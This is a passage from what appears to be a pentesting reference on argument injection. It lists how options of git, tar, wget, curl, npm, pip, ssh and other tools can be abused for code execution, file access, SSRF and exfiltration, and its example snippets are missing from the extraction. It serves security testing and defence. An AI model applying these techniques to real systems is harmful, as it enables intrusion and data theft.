Argument Injection
awk
system
awk
supports the system command that executes commands:
If spaces can not be inserted, sprintf can be used to bypass it:
References:
bundler
bundler install
bundler install uses gem
under the hood, therefore, it is possible to reuse gem's features for giving a profit.
Gemfile
Gemfile describes the gem dependencies required to execute associated Ruby code. Since it is a ruby file you can write arbitrary code that will be executed when running bundle install
.
When bundle install
is run the arbitrary ruby code will be executed.
gem dependency
Since bundler
uses gem install
to install the specified dependencies in Gemfile
you can use extensions to embed an arbitrary code.
When bundle install
is run the arbitrary ruby code will be executed.
References:
git dependency
One of the sources of gems for bundler
is git repositories with a gem's source code. Since a git repository contains a source code bundler
builds it before installing. Therefore, you can write an arbitrary code that will be executed when running bundle install
.
You can execute an arbitrary code using both gemspec file and native extensions
Create a repository on github.com
with the following hola.gemspec
file:
Add the repository to Gemfile
as a git dependency.
When bundle install
is run the arbitrary ruby code will be executed.
References:
path dependency
You can specify that a gem is located in a particular location on the file system. Relative paths are resolved relative to the directory containing the Gemfile
. Since a git repository contains a source code bundler
builds it before installing. Therefore, you can write an arbitrary code that will be executed when running bundle install
.
You can specify that a gem is located in a particular location on the file system. Relative paths are resolved relative to the directory containing the Gemfile
.
Similar to the semantics of the :git
option, the :path
option requires that the directory in question either contains a .gemspec
for the gem, or that you specify an explicit version that bundler should use.
Unlike :git
, bundler
does not compile native extensions for gems specified as paths
Therefore, you can gain code execution using the .gemspec file with an arbitrary code or built gem with native extension.
When bundle install
is run the arbitrary ruby code will be executed.
References:
curl
curl can be used to exfiltrate local files or write arbitrary content to them.
Additionally, the file:
scheme can be used to read or copy local files:
References:
find
exec
The -exec key can be used to execute arbitrary commands:
References:
execdir
-execdir is similar to -exec
, but the specified command is run from the subdirectory containing the matched items. -execdir
can be used to execute arbitrary commands:
fprintf
-fprintf can be used to write to local files:
find
provides various ways for writing to files, check out the man for more details.
References:
gem
gem build
gemspec
file is a ruby file that defines what is in the gem, who made it, and the version of the gem. Since it is a ruby file you can write arbitrary code that will be executed when running gem build
.
When gem build
is run the arbitrary ruby code will be executed.
References:
gem install
Extensions
gemspec
allows you to define extensions to build when installing a gem. Many gems use extensions to wrap libraries that are written in C with a ruby wrapper. gem
uses the extconf.rb
to build an extension during installation. Since it is a ruby file you can write arbitrary code that will be executed when running gem install
.
When gem install
is run the arbitrary ruby code will be executed.
References:
git
-c/--config-env
-c/--config-env passes a configuration parameter to the command. The value given will override values from configuration files. Check out the Abuse via .git/config section to find parameters that can be abused.
Remember that modern versions of Git support setting any config value via GIT_CONFIG* environment variables.
Abusing git directory
A git directory maintains an internal state, or metadata, relating to a git repository. It is created on a user's machine when:
The user does
git init
to initialise an empty local repositoryThe user does
git clone <repository>
to clone an existing repository from a remote location
The structure of a git directory is documented at https://git-scm.com/docs/gitrepository-layout
Note that a git directory is often, but not always, a directory named .git
at the root of a repo. There are several variables that can redefine a path:
GIT_COMMON_DIR environment variable or commondir file specifies a path from which non-worktree files will be taken, which are normally in
$GIT_DIR
.
Notice that the bare repositories do not have a .git
directory at all.
References:
Abuse via .git/config
.git/config
allows for the configuration of options on a per-repo basis. Many of the options allow for the specification of commands that will be executed in various situations, but some of these situations only arise when a user interacts with a git repository in a particular way.
There are at least the following ways to set the options:
On a system-wide basis using /etc/gitconfig file
On a global basis using ~/git/config or ~/.gitconfig files
On a local per-repo basis using .git/config file
On a local per-repo basis using .git/config.worktree file. This is optional and is only searched when
extensions.worktreeConfig
is present in.git/config
On a local per-repo basis using git -c/--config-env option
On a local per-repo basis using git-clone -c/--config option
core.gitProxy
core.gitProxy gives a command that will be executed when establishing a connection to a remote using the git://
protocol
core.fsmonitor
The core.fsmonitor option is used as a command which will identify all files that may have changed since the requested date/time.
In other words, many operations provided by the git will invoke the command given by core.fsmonitor
to quickly limit the operation's scope to known-changed files in the interest of performance.
At least the following git operations invoke the command given by core.fsmonitor
:
git status
used to show information about the state of the working tree, including whether any files have uncommitted changesgit add <pathspec>
used to stage changes for committing to the repogit rm --cached <file>
used to unstage changesgit commit
used to commit staged changesgit checkout <pathspec>
used to check out a file, commit, tag, branch, etc.
For operations that take a filename, core.fsmonitor
will fire even if the filename provided does not exist.
References:
core.hooksPath
core.hooksPath sets different path to hooks. You can create the post checkout hook within a repository, set the path to hooks with the hooksPath
, and execute arbitrary code.
To execute the payload, run the git-clone
:
References:
core.pager
core.pager specifies a text viewer for use by Git commands (e.g., less). The value is meant to be interpreted by the shell and can be used to execute arbitrary commands.
For example, in the following snippet git-grep
has the --open-files-in-pager
key that uses the default pager from core.pager
if the value is unspecified in the arguments:
If the pager value is not directly set by a user there is the order of preference:
GIT_PAGER
environment variable.core.pager
configuration.PAGER
environment variable.The default chosen at compile time (usually
less
).
So, the following snippet can also be used to execute commands:
core.sshCommand
core.sshCommand gives a command that will be executed when establishing a connection to a remote using the SSH protocol. If this variable is set, git fetch
and git push
will use the specified command instead of ssh
when they need to connect to a remote system.
diff.external
diff.external gives a command that will be used instead of git's internal diff function.
filter.<driver>.clean and filter.<driver>.smudge
filter..clean is used to convert the content of a worktree file to a blob upon checkin.
filter..smudge is used to convert the content of a blob object to a worktree file upon checkout.
References:
http.proxy and http.<URL>.proxy
http.proxy
or http.<URL>.proxy
override the HTTP proxy. You can use this to get SSRF:
Pay attention to other http.*
configs and remote.<name>.proxy
, they can help to increase the impact.
References:
Abuse via .git/hooks/
Various files within .git/hooks/ are executed upon certain git operations. For example:
pre-commit
andpost-commit
are executed before and after a commit operation respectivelypost-checkout
is executed after checkout operationpre-push
is executed before a push operation
On filesystems that differentiate between executable and non-executable files, Hooks are only executed if the respective file is executable. Furthermore, hooks only execute given certain user interaction, such as upon performing a commit.
For instance, you can use bare repositories to deliver custom git hooks and execute arbitrary code:
If the vulnerable code executes the following bash commands against the prepared repository, it will trigger the custom hook execution and result in the arbitrary code being executed:
References:
Abuse via .git/index
You can achieve an arbitrary write primitive using a crafted .git/index
file, check an advisory.
Abuse via .git/HEAD
It is possible to trick Git into loading a configuration from an unintended location by corrupting .git/HEAD
. In such cases, Git starts looking for repositories in the current folder, which an attacker can fully control, for example, if the current folder is a working tree with all the files of the cloned remote repository. The exploitation flow may look like this:
References:
git-blame
--output
git-blame
has the --output
option, which is not documented in the manual and is usually present on other git sub-commands. Executing git blame --output=foo
results in interesting behaviour:
Although the command failed, an empty file named foo
was created. If a file with the same name already exists, the destination file is truncated. This option provides an arbitrary file truncation primitive. For example, an attacker can use it to corrupt a critical file in the .git
folder like .git/HEAD
and trick Git into loading a configuration from an unintended location, check out the Abuse via .git/HEAD section.
References:
git-clone
-c/--config
-c/--config sets a configuration variable in the newly-created repository; this takes effect immediately after the repository is initialized, but before the remote history is fetched or any files checked out. Check the Abuse via .git/config section to find variables that can be abused.
ext URLs
git-clone
allows shell commands to be specified in ext
URLs for remote repositories. For instance, the next example will execute the whoami
command to try to connect to a remote repository:
References:
<directory>
git-clone
allows specifying a new directory to clone into. Cloning into an existing directory is only allowed if the directory is empty. You can use this to write a repo outside a default folder.
-u/--upload-pack
upload-pack specifies a non-default path for the command run on the other end when the repository to clone from is accessed via ssh. You can execute arbitrary code like this:
References:
git-diff
git-diff against /dev/null
git-diff
against /dev/null
can be used to read the entire content of a file even outside the git directory.
References:
--no-index
The --no-index key can be used to turn git-diff
into a normal diff
against another file in the git repository, which does not have to be tracked.
References:
git-fetch
--upload-pack
The --upload-pack flag can be used to execute arbitrary commands. The output is not shown, but it is possible to route the output to stderr using >&2
.
References:
git-fetch-pack
--exec
Same as --upload-pack
. Check out the section below.
--upload-pack
The --upload-pack flag can be used to execute arbitrary commands. The output is not shown, but it is possible to route the output to stderr using >&2
.
git-grep
--no-index
no-index
tells the git-grep to search files in the current directory that is not managed by Git. In other words, if a working directory is different from a repository one no-index
allows you to get access to files in the working directory.
References:
-O/--open-files-in-pager
-O/--open-files-in-pager opens the matching files in the pager
. It can be used to run arbitrary commands:
References:
git-log
--output
output
defines a specific file to output instead of stdout. You can use this to rewrite arbitrary files.
References:
git-ls-remote
--upload-pack
The --upload-pack flag can be used to execute arbitrary commands. The output is not shown, but it is possible to route the output to stderr using >&2
.
References:
git-pull
--upload-pack
The --upload-pack flag can be used to execute arbitrary commands. The output is not shown, but it is possible to route the output to stderr using >&2
.
References:
git-push
--receive-pack/--exec
receive-pack or exec specifies a path to the git-receive-pack program on the remote end. You can execute arbitrary code like this:
maven
Execution of arbitrary commands or code during mvn <PHASE>
execution is possible through the use of various plugins such as exec-maven-plugin or groovy-maven-plugin. In order to execute a malicious payload using the groovy-maven-plugin
plugin during the phase <PHASE>
you can use the following configuration:
For example, you can execute the plugin during mvn initialize
or mvn compile
using the following pom.xml
file:
References:
npm scripts
The scripts property of the package.json
file supports a number of built-in scripts and their preset life cycle events as well as arbitrary scripts. These all can be executed using npm run-script or npm run for short.
Scripts from dependencies can be run with npm explore <pkg> -- npm run <stage>
Pre and post commands with matching names will be run for those as well (e.g. premyscript
, myscript
, postmyscript
). To create pre or post scripts for any scripts defined in the scripts
section of the package.json
, simply create another script with a matching name and add pre
or post
to the beginning of them.
In the following example npm run compress
would execute these scripts as described.
There are some special life cycle scripts that happen only in certain situations. These scripts happen in addition to the pre<event>
, post<event>
, and <event>
scripts.
prepare
(since npm@4.0.0)Runs any time before the package is packed, i.e. during
npm publish
andnpm pack
Runs BEFORE the package is packed
Runs BEFORE the package is published
Runs on local
npm install
without any argumentsRun AFTER
prepublish
, but BEFOREprepublishOnly
NOTE: If a package being installed through git contains a
prepare
script, itsdependencies
anddevDependencies
will be installed, and the prepare script will be run before the package is packaged and installedAs of
npm@7
these scripts run in the background. To see the output, run with:--foreground-scripts
prepublish
(DEPRECATED)Does not run during
npm publish
, but does run duringnpm ci
andnpm install
prepublishOnly
Runs BEFORE the package is prepared and packed, ONLY on
npm publish
prepack
Runs BEFORE a tarball is packed (on
npm pack
,npm publish
, and when installing git dependencies)NOTE:
npm run pack
is NOT the same asnpm pack
.npm run pack
is an arbitrary user-defined script name, whereas,npm pack
is a CLI-defined command
postpack
Runs AFTER the tarball has been generated but before it is moved to its final destination (if at all, publish does not save the tarball locally)
npm cache add
npm cache add runs the following life cycle scripts:
prepare
npm ci
npm ci runs the following life cycle scripts:
preinstall
install
postinstall
prepublish
preprepare
prepare
postprepare
These all run after the actual installation of modules into node_modules
, in order, with no internal actions happening in between.
npm diff
npm diff runs the following life cycle scripts:
prepare
npm install
npm install runs the following life cycle scripts (also run when you run npm install -g <pkg-name>
):
preinstall
install
postinstall
prepublish
preprepare
prepare
postprepare
If there is a binding.gyp
file in the root of a package and install or preinstall scripts were not defined, npm
will default the install
command to compile using node-gyp via node-gyp rebuild
.
npm pack
npm pack runs the following life cycle scripts:
prepack
prepare
postpack
npm publish
npm publish runs the following life cycle scripts:
prepublishOnly
prepack
prepare
postpack
publish
postpublish
prepare
will not run during --dry-run
npm rebuild
npm rebuild runs the following life cycle scripts:
preinstall
install
postinstall
prepare
prepare
is only run if the current directory is a symlink (e.g. with linked packages)
npm restart
npm restart runs a restart script if it was defined, otherwise stop and start are both run if present, including their pre and post iterations):
prerestart
restart
postrestart
npm start
npm start runs the following life cycle scripts:
prestart
start
poststart
If there is a server.js
file in the root of your package, then npm
will default the start command to node server.js
. prestart
and poststart
will still run in this case.
npm stop
npm stop runs the following life cycle scripts:
prestop
stop
poststop
npm test
npm test runs the following life cycle scripts:
pretest
test
posttest
pip
pip install
Extending the setuptools
modules allows you to hook almost any pip
command. For instance, you can use the install
class within setup.py
file to execute an arbitrary code during pip install
running.
When pip install
is run the PostInstallCommand.run
method will be invoked.
References:
ssh
authorized_keys and id_*.pub
OpenSSH supports the command option, which specifies the command to be executed whenever a key is used for authentication.
References:
ssh_config
ssh
obtains configuration data from the following sources in the following order:
Command line
User's configuration file
~/.ssh/config
System-wide configuration file
/etc/ssh/ssh_config
LocalCommand
LocalCommand specifies a command to execute on the local machine after successfully connecting to the server. The following ssh_config
can be used to execute arbitrary commands:
References:
ssh-keygen
-D
ssh-keygen can load a shared library using the -D
key that leads to arbitrary command execution:
References:
tar
Checkpoints
A checkpoint is a moment of time before writing nth
record to the archive (a write checkpoint), or before reading nth
record from the archive (a read checkpoint). Checkpoints allow periodically executing arbitrary actions.
--to-command
When --to-command key is used, instead of creating the files specified, tar
invokes command and pipes the contents of the files to its standard output. So it can be used to execute arbitrary commands.
References:
-I/--use-compress-program
-I/--use-compress-program is used to specify an external compression program command that can be abused to execute arbitrary commands:
References:
terraform
terraform-plan
Terraform relies on plugins called "providers" to interact with remote systems. Terraform configurations must declare which providers they require, so that Terraform can install and use them.
You can write a custom provider, publish it to the Terraform Registry and add the provider to the Terraform code.
The provider will be pulled in during terraform init
and when terraform plan
is run the arbitrary ruby code will be executed.
Additionally, Terraform offers the external provider which provides a way to interface between Terraform and external programs. Therefore, you to use the external
data source to run arbitrary code. The following example from docs executes a python script during terraform plan
.
References:
wget
--use-askpass
--use-askpass specifies the command to prompt for a user and password. This key can be used to execute arbitrary commands without any arguments and stdout/stderr.
If no command is specified then the command in the environment variable WGET_ASKPASS
is used. If WGET_ASKPASS
is not set then the command in the environment variable SSH_ASKPASS
is used. Additionally, the default command for use-askpass
can be set up in the .wgetrc
.
References:
--post-file
--post-file can be used to exfiltrate files in a POST request.
References:
-O/--output-document
-o/--output-document can be used to download a remote file via a GET request and save it to a specific location.
References:
-o/--output-file
-o/--output-file specifies a logfile that will be used to log all messages normally reported to standard error. It can be used to write output to a file.
References:
-i/--input-file
-i/--input-file reads URLs from a local or external file. This key can be used to expose a file content in an error message:
References:
zip
-TT/--unzip-command
-TT/--unzip-command is used to specify a command to test an archive when the -T
option is used.
References:
Last updated